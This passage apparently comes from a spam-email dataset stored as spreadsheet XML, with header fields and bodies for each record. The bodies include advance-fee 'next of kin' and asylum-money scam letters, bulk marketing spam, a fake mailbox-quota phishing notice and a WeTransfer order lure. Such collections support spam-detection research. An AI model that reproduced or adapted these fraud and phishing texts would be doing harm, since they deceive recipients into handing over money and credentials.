to seek for political asylum here, is the location of the Security Company here in Amsterdam. \n\nSince President Jose Eduardo Dos Santos has lobbied the International Community to freeze my Uncle's assets and accounts abroad, to ground UNITA, and he has already done this in Angola, I cannot lodge the funds in my name any where in the world at the moment. Also I did not declare the funds to the government here on arrival last year. \n\nI plan to use this money to safeguard my future. It is very essential that you understand that this kind of trust and confidence I want to place in you is extraordinary, and an act of desperation on my part in order not to lose this money. Please ensure that this contact with you should be treated with utmost secrecy. \n\nYour role in this project, is to act on my behalf as a trustee to claim the safety deposit containing the money which is deposited in my name, from the Security company, since I can not participate in any business activity or open a bank account here as a political asylum seeker. \n\nAfter the safety deposit is claimed, the money will lodged into an account preferably a new account you should open for this transaction. My share of the money will be returned to me when my asylum application in this country is granted, and I have permission to do business and open an account here. \n\nFor your reliable assistance, I will reward you with 15 %($2,775,000) of the money. \n\nI have with me, the Certificate of Deposit and the release codes of the vaults for the safety deposit, which is in my name, and will be used for claim from the security company. Also, everything will be legally processed for transfer of ownership to you. This transaction should be completed immediately depending on your prompt response. \n\nI thank you in advance as I anticipate your assistance in enabling me achieve this goal. \n\nPlease contact me on my private email address; olivsav@netscape.net  whether or not you are interested in assisting us. This will enable us make alternative plans, in the event of non-interest on your part. \n\nTo know more about the struggle by UNITA to liberate Angola, visit the links below and read. \n\n[URL]http://www.the-idler.com[/URL]  \n\n[URL]http://news.bbc.co.uk[/URL]  \n\nSincerely, \nO.C.Savimbi. \n\n\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.the-idler.com http://news.bbc.co.uk</t>
  </si>
  <si>
    <t>2747</t>
  </si>
  <si>
    <t>To: nan\nFrom: mark nguessane &lt;mark43nguessane@hotmail.com&gt;\nDate: Tue, 28 Nov 2006 19:06:33 +0000</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2006 19:06:33 +0000</t>
  </si>
  <si>
    <t>mark nguessane &lt;mark43nguessane@hotmail.com&gt;</t>
  </si>
  <si>
    <t>&gt;From Mark Nguessane.\n\nDear ,\n\nI am Mark Nguessane from Seirra-Leone I am the son of Chief Nguessane Bakari \nwho was the managing director and owner of NGEBAK Import/Export \ncompany,NGEBAK Logistics company and NGEBAK Glass company here in Abidjan \nCote d'Ivoire West Africa.\n\nDear I humbly wish to write you this letter in order that you will assist me \nand my only Sister Cecilia in this money transfer to your bank account in \nyour country for investment in a profitable business.\n\nOn the 11th october 2004 our late father attended the general meeting of all \nthe import/export companies in the country and unfortunately he was poisoned \nby his business rivals and he later died in the hospital.\n\nBut before his death,after staying in bed for three days in the hospital,he \ntold me that he deposited the sum of US$12,000,000.(Twelve Million US \ndollars) in a bank here in abidjan on behalf of his foreign business partner \nin abroad and he advised me to look for a co-beneficiary from abroad to \ntransfer these money to his account for investment in his country.\n\nPresently,the members of his extended family has claimed all his companies \nleaving nothing behind for us,his extended family members also sent us away \nfrom his house where we are living and they seized all our house hold \nproperties.\n\nWe are presently now staying in a hotel here in Abidjan Cote d'Ivoire \nbecause of our lives and the security of the valid documents which the bank \ngave to our late father on the day he made the deposit lest the members of \nour late fathers extended family will kill us and Claim these money in the \nbank.\n\nBased on our ignorance in the international business world of this sort,we \nhereby solicit for your urgent assistance as the co-beneficiary of these \nmoney, for the bank to transfer these money to your safe and secured bank \naccount in your country.\n\nfor further proceedings as we wait for your soonest response. Please,we \ndon't want neither third party nor publicity of any kind in this business \ntransaction as we have agreed to offer you 25% of the total sum and 75% will \nbe for us respectively as you will also assist us to join you in your \ncountry as soon as this money is transfered to your account in your country \nfor the investment.\n\nThanks in advance as we wait for your soonest response,\n\nYours Sincerely,\n\nMark and Cecillia Nguessane.\n\n_________________________________________________________________\nMSN Messenger: appels gratuits de PC à PC ! \n[URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2745</t>
  </si>
  <si>
    <t>To: nan\nFrom: kaka yobo &lt;kaka_yobo20@hotmail.fr&gt;\nDate: Tue, 28 Nov 2006 13:26:25 +0100</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2006 13:26:25 +0100</t>
  </si>
  <si>
    <t>kaka yobo &lt;kaka_yobo20@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>\ndear friend,\nI am the manager of bill and exchange at the foriegn remittance department\nof AFRICAN DEVELOPMENT BANK. I am writing, following the impressive\ninformation about you through one of my friends WORKS WITH THE BURKINA \nCHAMBERS firm.\n\nIn my department we discovered an abandoned sum of $U.S15.5Million dollars\n(fifteen million five hundred thousand US dolloars)  in an account that \nbelongs\n\nto one of our foriegn customer who died along with his entire family in\nNovember 2004  in a plane crash.\nSince we got information about his death, we have been expecting his next\nof kin to come over and claim his money because we cannot release it unless\n\nsome body applies for it as next of kin or relation to the deceased as\nindicated in our banking  guidlines and laws but unfortunately we learnt\nthat all his supposed next of kin or relation died alongside  with him at\nthe plane crash leaving nobody behind for the claim. It is therefore upon\nthis discovery that I and other officials in my department now decided to\nmake this business proposal to you and release the money to you as the next\n\nof kin or relation to the deceased for safety and subsequent disbursement\nsince nobody is coming for it and we don't want this money to go into the\nbank treasury as unclaimed bill.\nThe banking law and guidling here stipulates that  if such money remained\nunclaimed after six years the money will be transfered into the bank\ntreasury as unclaimed fund.  The request of foreigner as next of kin in\nthis business is occassioned by the fact  that the customer was a foreigner\n\nand a Burkinabe cannot stand as next of kin to a foreigner.\nWe agree that 30% of this money will be for you as a foreign partner, in\nrespect  to the  provision of a foriegn account, 10% will be set aside for\nexpenses occured during the business and 60% would be for me and my\ncolleagues. There after I and my colleagues will visit your country for\ndisbursement according  to the percentage indicated.\nTherefore, to enable the immediate transfer of this fund to you as\narranged, you must apply first to the bank as relation or next of kin of\nthe deceased indicating your bank name, your bank account number, your\nprivate telephone and fax number for easy and effective communication and\nlocation wherein the money will be remitted.\nUpon receipt of your reply, I will send to you by fax or email the text of\nthe application. I will not fail to bring to your notice that this\ntransaction is hitch  -free and that you should not entertain any atom of\nfear as all required arrangements have been made for the transfer.\nYou should contact me immediately as soon as you recieve this letter.\nYours faithful\nBill &amp; Exchange Manager.\nYOBO\n\n_________________________________________________________________\nLes rvlations de la starac 6 commentes par Jrmy! \n[URL]http://starac2006.spaces.live.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://starac2006.spaces.live.com</t>
  </si>
  <si>
    <t>4997</t>
  </si>
  <si>
    <t>To: Member21@mandark.labs.netnoteinc.com\nFrom: &lt;corina-toma@webmail.co.za&gt;\nDate: Tue, 28 May 2002 21:49:40 -0100</t>
  </si>
  <si>
    <t>Tue, 28 May 2002 21:49:40 -0100</t>
  </si>
  <si>
    <t>&lt;corina-toma@webmail.co.za&gt;</t>
  </si>
  <si>
    <t>Member21@mandark.labs.netnoteinc.com</t>
  </si>
  <si>
    <t>your registration</t>
  </si>
  <si>
    <t>PUBLIC ANNOUNCEMENT:\n\nThe new .NAME domain extension is currently being released to the general public. Unlike the original .COM and .NET domain names, the new .NAME domain was specifically created for individuals such as yourself. The .NAME domain appears in the format: FirstName.LastName.NAME For example, if your name is Monica Smith, then you can register a name such as monica.smith.name Technology experts predict that personalized domain names will soon be used as international identifiers much the same was that phone numbers are used today. For a limited time, you can pre-register your unique .NAME domain for only $10 (plus applicable registry fees) at: [URL]http://www.namesforeveryone.com[/URL] \n\n\nTo remove your email address from further promotional mailings from this company, click here:\n[URL]http://www.centralremovalservice.com[/URL]\n21\n9488ycte7-565FWHF6137iGcL4-997l28</t>
  </si>
  <si>
    <t>http://www.namesforeveryone.com http://www.centralremovalservice.com</t>
  </si>
  <si>
    <t>4998</t>
  </si>
  <si>
    <t>To: &lt;yyyy@spamassassin.taint.org&gt;\nFrom: "USA Financial" &lt;usafin@insurancemail.net&gt;\nDate: Tue, 28 May 2002 21:03:12 -0400</t>
  </si>
  <si>
    <t>Tue, 28 May 2002 21:03:12 -0400</t>
  </si>
  <si>
    <t>"USA Financial" &lt;usafin@insurancemail.net&gt;</t>
  </si>
  <si>
    <t>Fill a Room with 300 People</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_385302_01C20675.6F2940B0 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: 7bit  Would you like to fill a room with 300 of these people?	  	  ...that's what we do!	 End All Senior Market Prospecting Problems Instantly and Painlessly!    _____   Get record breaking results with the USA Financial Turnkey, Worry-Free Auto-Pilot Client Seminar Marketing System and Formula! Use the same methods we used to get 20,898 RSVP's in only 15 short months. Learn our secret Asset-Cycle Sales Presentation that earns $10,000-$30,000 per client, and get free attendance to our 2-day coaching adacemy! Learn our coveted secrets to Easily and Consistently Collect Millions &amp; Millions in assets!  ?	 Average of 131 RSVP's per seminar...Over 200 Seminars Conducted ?	 Average of 80% Attendance Ratio &amp; 60% Appointment Ratio ?	 Some Actual Sample RSVP's: 337 IL, 194 FL, 196 TX, 221 WI, 151 CA, 220 PA, 158 GA	  ?	 Shared Statistics on Over a Year's Worth of Seminar Performance ?	 380 Testimonials from other Financial Advisors, Reps &amp; Agents   _____   Call our 24-hour automated response line  for your FREE report and audiotape ($97 value!)  800-436-1631 ext. 86005	 ? or ? Please fill out the form below for your FREE report and audiotape! Name:	  	 E-mail:	  	 Phone:	  	 Fax:	  	 Address:	  	 City:	  	State:  	Zip:  	 	  	  	 	   	     USA Financial - [URL]www.usa-financial.com[/URL]    We don't want anybody to receive our mailings who does not wish to receive them. This is professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.InsuranceMail.net[/URL]   Legal Notice   ------=_NextPart_000_385302_01C20675.6F2940B0 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Free Report and Audio Tape =20     =20        =20            =20            =20            =20                          End All Senior Market Prospecting Problems Instantly and = Painlessly!=20              =20              Get record breaking = results with the=20              USA Financial=20             Turnkey, Worry-Free Auto-Pilot Client Seminar Marketing = System and=20             Formula! Use the same methods we used to get 20,898 RSVP's = in only=20             15 short months. Learn our secret Asset-Cycle Sales = Presentation that=20             earns $10,000-$30,000 per client, and get free attendance to = our 2-day=20             coaching adacemy! Learn our coveted secrets to Easily and = Consistently=20             Collect Millions &amp; Millions in assets! =20            =20              =20                 • Average of 131 RSVP's per seminar...Over 200 Seminars = Conducted =20                 • Average of 80% Attendance Ratio &amp; 60% Appointment = Ratio =20                 • Some Actual Sample RSVP's: 337 IL, 194 FL, 196 TX, 221 = WI, 151 CA, 220 PA, 158 GA =20                 • Shared Statistics on Over a Year's Worth of Seminar = Performance  =20                 • 380 Testimonials from other Financial Advisors, Reps = &amp; Agents =20              =20            Call our 24-hour automated response line              for your FREE report and = audiotape ($97=20             value!) =20           — or — =20                  =20                      =20                         Please fill out the form below = for your FREE report and audiotape! =20                         Name: =20                            =20                         E-mail: =20                            =20                         Phone: =20                            =20                         Fax: =20                            =20                         Address: =20                            =20                         City: =20                            State:=20                            Zip:=20                            =20                           =20                              =20                                          =20            =20     =20        We=20         don't want anybody to receive our mailings who does not wish to = receive=20         them. This is professional communication sent to insurance = professionals.=20         To be removed from this mailing list, DO NOT REPLY to = this message.=20         Instead, go here: [URL]http://www.InsuranceMail.net[/URL] Legal Notice ------=_NextPart_000_385302_01C20675.6F2940B0--</t>
  </si>
  <si>
    <t>www.usa-financial.com http://www.InsuranceMail.net http://www.InsuranceMail.net</t>
  </si>
  <si>
    <t>4999</t>
  </si>
  <si>
    <t>To: yyyy@mvslaser.com\nFrom: plhn242211075@yahoo.com\nDate: Tue, 28 May 2002 20:15:22 -0500</t>
  </si>
  <si>
    <t>Tue, 28 May 2002 20:15:22 -0500</t>
  </si>
  <si>
    <t>plhn242211075@yahoo.com</t>
  </si>
  <si>
    <t>yyyy@mvslaser.com</t>
  </si>
  <si>
    <t>business news: a marketing product to make all others obsolete 21107543</t>
  </si>
  <si>
    <t>PROMOTE YOUR PRODUCT OR SERVICE TO MILLIONS TODAY!\n\nE-MAIL MARKETING\n- Complete collection of e-mail software &amp; unlimited addresses, only $199.\n- Bulk e-mail will make you money so fast, your head will spin!\n\nFAX MARKETING SYSTEM\n- 4 Million fax numbers &amp; fax broadcasting software, only $249.\n- People are 4 X more likely to read faxes than mail!\n\n1 MILLION AMERICAN BUSINESS LEADS ON CD\n- Contains company name, address, phone, fax, SIC, # of employees &amp; revenue\n- Unlimited downloads!\n\n\nVisit our Web Site: [URL]http://81.9.8.7[/URL]\n\nor call us at 618-288-6661\n\n \n\n \n\n \n\n \n\nto be taken off of our list respond here mailto:l1l12345a1@btamail.net.cn</t>
  </si>
  <si>
    <t>http://81.9.8.7</t>
  </si>
  <si>
    <t>5001</t>
  </si>
  <si>
    <t>To: &lt;v.givens@netnoir.net&gt;, &lt;muret@worldnet.att.net&gt;,\nFrom: "GEORGIANA" &lt;aestrike@post.sk&gt;\nDate: Tue, 28 May 2002 12:35:33 -1800</t>
  </si>
  <si>
    <t>Tue, 28 May 2002 12:35:33 -1800</t>
  </si>
  <si>
    <t>"GEORGIANA" &lt;aestrike@post.sk&gt;</t>
  </si>
  <si>
    <t>&lt;v.givens@netnoir.net&gt;, &lt;muret@worldnet.att.net&gt;,</t>
  </si>
  <si>
    <t>best mortgage rate              GZRHTKJ</t>
  </si>
  <si>
    <t>As to\n\n\n\nWant to refinance?\n\nFill out this quick form and immediately have mortgage\ncompanies compete for you business. \n\nYou will be offered the, absolute, BEST refinance rates \navailable!\n\nYour credit doesn't matter, don't even worry about past \ncredit problems, we can refinance ANYONE!\n\nLet Us Put Our Expertise to Work for You!\n\n[URL]http://save.ac2002.net[/URL]\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nErase\n[URL]http://save.ac2002.net[/URL]</t>
  </si>
  <si>
    <t>http://save.ac2002.net http://save.ac2002.net</t>
  </si>
  <si>
    <t>4989</t>
  </si>
  <si>
    <t>To: &lt;john@netnv.net&gt;\nFrom: "Jane Nicholson" &lt;qulilehregsarr@hotmail.com&gt;\nDate: Tue, 28 May 2002 06:03:02 -0300</t>
  </si>
  <si>
    <t>Tue, 28 May 2002 06:03:02 -0300</t>
  </si>
  <si>
    <t>"Jane Nicholson" &lt;qulilehregsarr@hotmail.com&gt;</t>
  </si>
  <si>
    <t>&lt;john@netnv.net&gt;</t>
  </si>
  <si>
    <t>Do you need a second MORTGAGE?                    26828</t>
  </si>
  <si>
    <t>|  \n  \n**Dear HOMEOWNER,**  \n  \n---  \n|\n\n**Inte= rest rates are at their lowest point in 40 years!**  \n  \n---  \n|\n\n**Let us do the shopp= ing for you... AND IT'S FREE!**\n\n![](3D"[URL]http://61.129.81.70[/URL]")\n\n| _  \nOur nationwide network of lenders have hundreds of different l= oan programs\nto fit your current situation:_ **\n\n  * Refinance\n  * Second Mortgage\n  * Debt Consolidation\n  * Home Improvement\n  * Purchase \n\n**\n\nPlease **CLICK HERE** to fill out a quic= k form. Your request will be\ntransmitted to our network of mortgage speci= alists.  \n  \n---|---  \n  \n  \n  \n  \n---  \n  \n**This service is 100% FREE to home owners and new home buyers without any ob=\nligation.**  \n  \n---  \n  \nDid you receive an email advertisement in err= or? Our goal is to only target\nindividuals who would like to take advant= age of our offers. If you'd like to\nbe removed from our mailing list, pl= ease click on the link below. You will\nbe removed immediately and automat= ically from all of our future mailings.  \n  \n  \n---  \nWe protect all email addresses from other third parties. Thank you= . | =\nPlease remove me.\n\n</t>
  </si>
  <si>
    <t>http://61.129.81.70</t>
  </si>
  <si>
    <t>1948</t>
  </si>
  <si>
    <t>To: siesokabila2@webmail.co.za\nFrom: sieso kabila &lt;siesokabila2@webmail.co.za&gt;\nDate: Tue, 28 Mar 2006 23:20:38 +0200</t>
  </si>
  <si>
    <t>Tue, 28 Mar 2006 23:20:38 +0200</t>
  </si>
  <si>
    <t>sieso kabila &lt;siesokabila2@webmail.co.za&gt;</t>
  </si>
  <si>
    <t>siesokabila2@webmail.co.za</t>
  </si>
  <si>
    <t>MY GOOD FRIEND</t>
  </si>
  <si>
    <t>MR. SIESO D KABILA\nABIDJAN-COTE D'IVORE\nMY GOOD FRIEND\nCONTACT ME BY THIS \nEMAIL ADDRESS: (siesokabila@yahoo.co.in)\n\nFIRST I MUST SOLICIT YOUR CONFIDENCE IN THIS TRANSACTION\nAND I PRAY TO \nGOD THAT MY DECISION TO CONTACT YOU WILL BE GENUINELY\nAPPROVED \nCONSIDERING THE FACT THAT WE HAVE NOT KNOWN EACH OTHER\nPERSONALLY. I HAVE \nHOWEVER REVIEWED YOUR PROFILE AND COMPLETELY SATISFIED THAT\nYOU ARE THE \nAPPROPRIATE CANDIDATE. I PRAY TO SEIZE THIS OPPORTUNITY TO\nINTRODUCE \nMYSELF.\n\nI AM MR. SIESO D. KABILA SON TO LATE PRESIDENT OF THE\nDEMOCRATIC \nREPUBLIC OF CONGO, MR. LAURENT D. KABILA WHO WAS BRUTALLY\nMURDERED BY \nONE OF HIS PERSONAL SECURITY BODY GUARD WHOM WAS BELIEVED\nTO HAVE BEEN \nSPONSORED BY MEMBERS OF THE REBEL GROUPS IN OUR COUNTRY.\n\nDURING HIS REIGN, I FRONTED FOR HIM IN THE SALES OF DIAMOND\nAND \nTANTALITE TO SOME DUTCH AND FRENCH COMPANIES AND THE\nPROCEEDS $85.5 MILLION \n(USD) PAID BACK TO HIM WHICH HE KEPT IN A TRUNK BOX AND\nMOVED IT INTO A \nSECURITY COMPANY IN ABIDJAN-COTE D'IVORE\n. AFTER HIS DEATH AND THE IMMEDIATE \nAPPOINTMENT OF OUR ELDER BROTHER PRESIDENT JOSEPH KABILA HE\nREQUESTED THAT I \nSHOULD BRING BACK THE DOCUMENTS OF THIS DEPOSIT BECAUSE\nTHEY ARE ALL \nAWARE THAT I AM THE ONLY ONE GIVEN SUCH TASK BY MY LATE\nFATHER BUT I \nDECLINE THAT I DON'T HAVE SUCH DOCUMENTS WITH ME HENCE HE\nHAS BEEN ELECTED \nTHE PRESIDENT, I AM ENTITLED TO WHAT I CAN LAY MY HANDS ON\nAS A FORM OF \nINHERITANCES FROM OUR LATE FATHER BECAUSE MY FATHER HAS TWO\nWIVES SO \nEVERY ONE HAS TO CATERED FOR THEIR MOTHERS. \n\nI AM CONFIDING IN YOU NOT TO LET THIS OUT TO ANYONE. I\nINTEND TO GO \nINTO PARTNERSHIP AGREEMENTS WITH YOU FOR OUR INVESTMENT, AS\nWE WILL BOTH \nAGREE UPON. I WANT TO AS A MATTER OF TRUST AND URGENCY TO\nHELP ME MOVE \nTHESE FUNDS OUT OF AFRICA. FOR EASY COMMUNICATION I REQUIRE\nWITHOUT \nDELAY YOUR FULL DATES. IF YOU ARE INTERESTED, PLEASE\nCONTACT ME BY THIS \nEMAIL ADDRESS: d19_71@yahoo.com\n\nYOURS FAITHFULLY\nMR. FROM: MR. JERRY D. KABILA.\n\nMY GOOD FRIEND\nFIRST I MUST SOLICIT YOUR CONFIDENCE IN THIS TRANSACTION\nAND I PRAY TO \nGOD THAT MY DECISION TO CONTACT YOU WILL BE GENUINELY\nAPPROVED \nCONSIDERING THE FACT THAT WE HAVE NOT KNOWN EACH OTHER\nPERSONALLY. I HAVE \nHOWEVER REVIEWED YOUR PROFILE AND COMPLETELY SATISFIED THAT\nYOU ARE THE \nAPPROPRIATE CANDIDATE. I PRAY TO SEIZE THIS OPPORTUNITY TO\nINTRODUCE \nMYSELF.\n\nI AM MR. JERRY D. KABILA SON TO LATE PRESIDENT OF THE\nDEMOCRATIC \nREPUBLIC OF CONGO, MR. LAURENT D. KABILA WHO WAS BRUTALLY\nMURDERED BY \nONE OF HIS PERSONAL SECURITY BODY GUARD WHOM WAS BELIEVED\nTO HAVE BEEN \nSPONSORED BY MEMBERS OF THE REBEL GROUPS IN OUR COUNTRY.\n\nDURING HIS REIGN, I FRONTED FOR HIM IN THE SALES OF DIAMOND\nAND \nTANTALITE TO SOME DUTCH AND FRENCH COMPANIES AND THE\nPROCEEDS $85.5 MILLION \n(USD) PAID BACK TO HIM WHICH HE KEPT IN A TRUNK BOX AND\nMOVED IT INTO A \nSECURITY COMPANY IN ACCRA GHANA. AFTER HIS DEATH AND THE\nIMMEDIATE \nAPPOINTMENT OF OUR ELDER BROTHER PRESIDENT JOSEPH KABILA HE\nREQUESTED THAT I \nSHOULD BRING BACK THE DOCUMENTS OF THIS DEPOSIT BECAUSE\nTHEY ARE ALL \nAWARE THAT I AM THE ONLY ONE GIVEN SUCH TASK BY MY LATE\nFATHER BUT I \nDECLINE THAT I DON'T HAVE SUCH DOCUMENTS WITH ME HENCE HE\nHAS BEEN ELECTED \nTHE PRESIDENT, I AM ENTITLED TO WHAT I CAN LAY MY HANDS ON\nAS A FORM OF \nINHERITANCES FROM OUR LATE FATHER BECAUSE MY FATHER HAS TWO\nWIVES SO \nEVERY ONE HAS TO CATERED FOR THEIR MOTHERS. \n\nI AM CONFIDING IN YOU NOT TO LET THIS OUT TO ANYONE. I\nINTEND TO GO \nINTO PARTNERSHIP AGREEMENTS WITH YOU FOR OUR INVESTMENT, AS\nWE WILL BOTH \nAGREE UPON. I WANT TO AS A MATTER OF TRUST AND URGENCY TO\nHELP ME MOVE \nTHESE FUNDS OUT OF AFRICA. FOR EASY COMMUNICATION I REQUIRE\nWITHOUT \nDELAY YOUR FULL DATES. IF YOU ARE INTERESTED, PLEASE\nCONTACT ME BY THIS \nEMAIL ADDRESS: (siesokabila@yahoo.co.in)\n\nYOURS FAITHFULLY\nMR. SIESO D KABILA\n\nCell: +22506228017\n\n___________________________________________________________________\nFor super low premiums, click here [URL]http://www.webmail.co.za[/URL]\n\n[URL]http://www.webmail.co.za[/URL] the South African FREE email service\n\n\n</t>
  </si>
  <si>
    <t>http://www.webmail.co.za http://www.webmail.co.za</t>
  </si>
  <si>
    <t>285</t>
  </si>
  <si>
    <t>To: nan\nFrom: Email Account Administrator &lt;sea_import@wikasa.co.id&gt;\nDate: Tue, 28 Jun 2016 00:49:48 +0700 (WIT)</t>
  </si>
  <si>
    <t>Tue, 28 Jun 2016 00:49:48 +0700 (WIT)</t>
  </si>
  <si>
    <t>Email Account Administrator &lt;sea_import@wikasa.co.id&gt;</t>
  </si>
  <si>
    <t>Dear User</t>
  </si>
  <si>
    <t>Dear User, \n\nYour mailbox quota is full\nThis may cause your mailbox fault or you may not be able to receive more e-mail\n\nTo continue using your mailbox, you need to clicking on this link: \n[URL]http://www.smartsurvey.co.uk[/URL] and complete the required details and click on up date.\nOnce the upgrade is complete, your mailbox will work effectively. \n\nMail Administrator 2016\n\n</t>
  </si>
  <si>
    <t>http://www.smartsurvey.co.uk</t>
  </si>
  <si>
    <t>1227</t>
  </si>
  <si>
    <t>To: Recipients &lt;procure@einihutintl.gq&gt;\nFrom: Maria Pietrygas &lt;procure@einihutintl.gq&gt;\nDate: Tue, 28 Jul 2020 02:16:58 +0300</t>
  </si>
  <si>
    <t>Tue, 28 Jul 2020 02:16:58 +0300</t>
  </si>
  <si>
    <t>Maria Pietrygas &lt;procure@einihutintl.gq&gt;</t>
  </si>
  <si>
    <t>Recipients &lt;procure@einihutintl.gq&gt;</t>
  </si>
  <si>
    <t>Re: New Order Inquiry</t>
  </si>
  <si>
    <t>Hello,  I hope you are safe from the Covid 19.  We are currently back to work and our company hope to place our urgent orders as previously discussed before the lockdown. Kindly find below our attached order via Wetransfer and confirm availability of all products.  [URL]https://wetransfer.com[/URL]  Kindly send in your best quote and shortest delivery time.  -  Greetings! Maria Pietrygas (Import Manager) Nautril Holdings Athens Gr Tel.08872917845 Hello, I hope you are safe from the Covid 19. We are currently back to work and our company hope to place our urgent orders as previously discussed before the lockdown.Kindly find below our attached order via Wetransfer and confirm availability of all products. [URL]https://wetransfer.com[/URL] Kindly send in your best quote and shortest delivery time. - Greetings!Maria Pietrygas (Import Manager)Nautril HoldingsAthens GrTel.08872917845</t>
  </si>
  <si>
    <t>https://wetransfer.com https://wetransfer.com</t>
  </si>
  <si>
    <t>79</t>
  </si>
  <si>
    <t>To: josephbenson@weedmail.com\nFrom: joseph benson &lt;josephbenson@weedmail.com&gt;\nDate: Tue, 28 Jan 2003 16:45:52 -0800</t>
  </si>
  <si>
    <t>Tue, 28 Jan 2003 16:45:52 -0800</t>
  </si>
  <si>
    <t>joseph benson &lt;josephbenson@weedmail.com&gt;</t>
  </si>
  <si>
    <t>josephbenson@weedmail.com</t>
  </si>
  <si>
    <t>NEXT OF KIN</t>
  </si>
  <si>
    <t>ATTN:PRESIDENT     \n\n I am  BARRISTER JOSEPH BENSON,the Personal Attorney to Mr Larry\nGlenn , A foreigner  who used to work with shell development company\nin Nigeria.On the 21st of April 1999, my client, his wife And their\nthree children were involved in a car accident along Sagbama Express\nRoad.All occupants of the vehicle unfortunately lost there lives.\nSince then I have made several enquiries to your embassy to locate\nany of my clients extended relatives, this has also proved\nunsuccessful.After these several unsuccessful attempts, I decided to\ntrace his relatives over the Internet, to locate any member of his\nfamily but of no avail, hence I contacted you. I have contacted you\nto assist inrepartrating the money before they get confisicated or \ndeclared unserviceable by the finance house where this\nhuge deposits were lodged. \nParticularly, the Bank where the deceased had an account valued at \nabout 9 million dollars has issued me a notice to provide the next of \nkin or have the account confisicated within the next ten official\nworking days. since I have been unsuccesfull in locating the\nthe relatives for over 2 years now I seek your consent to present you\nas the next of kin of the deceased the proceeds of this account\nvalued at $19.8 million dollars can be paid to you and then you and i\ncan share the money. 55% to me and 40% to you,while 5% should be for\nexpenses or tax as your government may require,I have all \nnecessary legal documents that can be used to back up any claim we\nmay \nmake.All I require is your honest cooperation to enable us see this\ndeal through. I guarantee that this will be executed under a\nlegitimate \narrangement that will protect you from any breach of the law.Please\nget \nin touch with me if you indicated interest to enable us discuss\nfurther.\nI await for your urgent response. contact also on my confidential email \naddress:ggfxggnextnet@mail.com.call me on my tel no:234-1-4734635\nBest regards, \nBARRISTER JOSEPH BENSON\n\n\n\n\n\n\n\n------------------------------------------------------------\nYo Yo's shall return, they always do! \nInterested in YoYo's?  Click-&gt; [URL]http://TheYo.com[/URL]\n\n\n---------------------------------------------------------------------\nExpress yourself with a super cool email address from BigMailBox.com.\nHundreds of choices. It's free!\n[URL]http://www.bigmailbox.com[/URL]\n---------------------------------------------------------------------\n\n</t>
  </si>
  <si>
    <t>http://TheYo.com http://www.bigmailbox.com</t>
  </si>
  <si>
    <t>1056</t>
  </si>
  <si>
    <t>To: webmaster@aclweb.org\nFrom: BARRISTER TANJUMAH AHMED &lt;tanjumah_ahmed@critterpost.com&gt;\nDate: Tue, 28 Dec 2004 20:38:19 +0700</t>
  </si>
  <si>
    <t>Tue, 28 Dec 2004 20:38:19 +0700</t>
  </si>
  <si>
    <t>BARRISTER TANJUMAH AHMED &lt;tanjumah_ahmed@critterpost.com&gt;</t>
  </si>
  <si>
    <t>SWIFT RESPONSE PLZ.</t>
  </si>
  <si>
    <t>From- : Barrister Tanjumah Ahmed. \n\nGood Day, \n\nI am Barrister Tanjumah Ahmed a solicitor at law and personal attorney to late Mr Shinji Tomoda. \n\nWho is a Japanese business merchant based in Taiwan .Mr Shinji Tomoda was on his way to Puerto Rico to see his youngest grandson for the first time was involved in an airways plane crash.The scenes of arrivals and departures between Taipei and Los Angeles reveal the emotional extremes involved in an airline disaster. \n\nPlease open the below page immediatetly to verify and View the news flash of the plane crash. \n\n[URL]http://www.disasterrelief.org[/URL] \n\nSince the death of my late client none of his family members had been traced.The late Mr.Shinji Tomoda deposited the sum of USD6.5M with a security company before his death in Thailand.  I have contacted you assist me in the transfer of his funds to your account designation for us to benefits this money before they get confiscated by the Bank.Since there is a government gazette mandating/authorizing banks to place a hold or freeze any account containing huge sums of money that has been unserviceable for a reasonable period of time. \n\nThis is geared towards forestalling capital flight from the economy Prior to the execution of this directive; I am now soliciting for your assistance/co-operation in going to Thailand to signoff and claim this fund from the security company since the funds were deposited with an open beneficiary.Thus I will file and application on your behalf and front you as the bonafide beneficiary and next of kin for the release of the funds to your account. \n\nUpon your readiness to travel to Thailand to sign off and claim the fund from the security company, I will forward to you the necessary documents to enable you make adequate claim over the funds and have access to it. Iwill also forward to you the contact details of the security company and the officer to contact so as to avoid the accumulation of much demurrage on the deposited consignment from the security company. \n\nI will immediatetly sign a memorandum of understanding once you indicate your interest to assist me in this regards, and for your assistance you shall have 40% of the total fund while I take 50%,then the remaining 10% will be used to incure for expenses made by both parties local and inertnational in the cause of this transaction. \n\nYour soonest response is anticipated. \n\nRegards, \n\nBarrister  Tanjumah ahmed. \n\n\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.disasterrelief.org</t>
  </si>
  <si>
    <t>1504</t>
  </si>
  <si>
    <t>To: nan\nFrom: Alexei Boris &lt;alexeivan202@sify.com&gt;\nDate: Tue, 27 Sep 2005 20:23:43 +0200</t>
  </si>
  <si>
    <t>Tue, 27 Sep 2005 20:23:43 +0200</t>
  </si>
  <si>
    <t>Alexei Boris &lt;alexeivan202@sify.com&gt;</t>
  </si>
  <si>
    <t>INVESTMENT REQUEST</t>
  </si>
  <si>
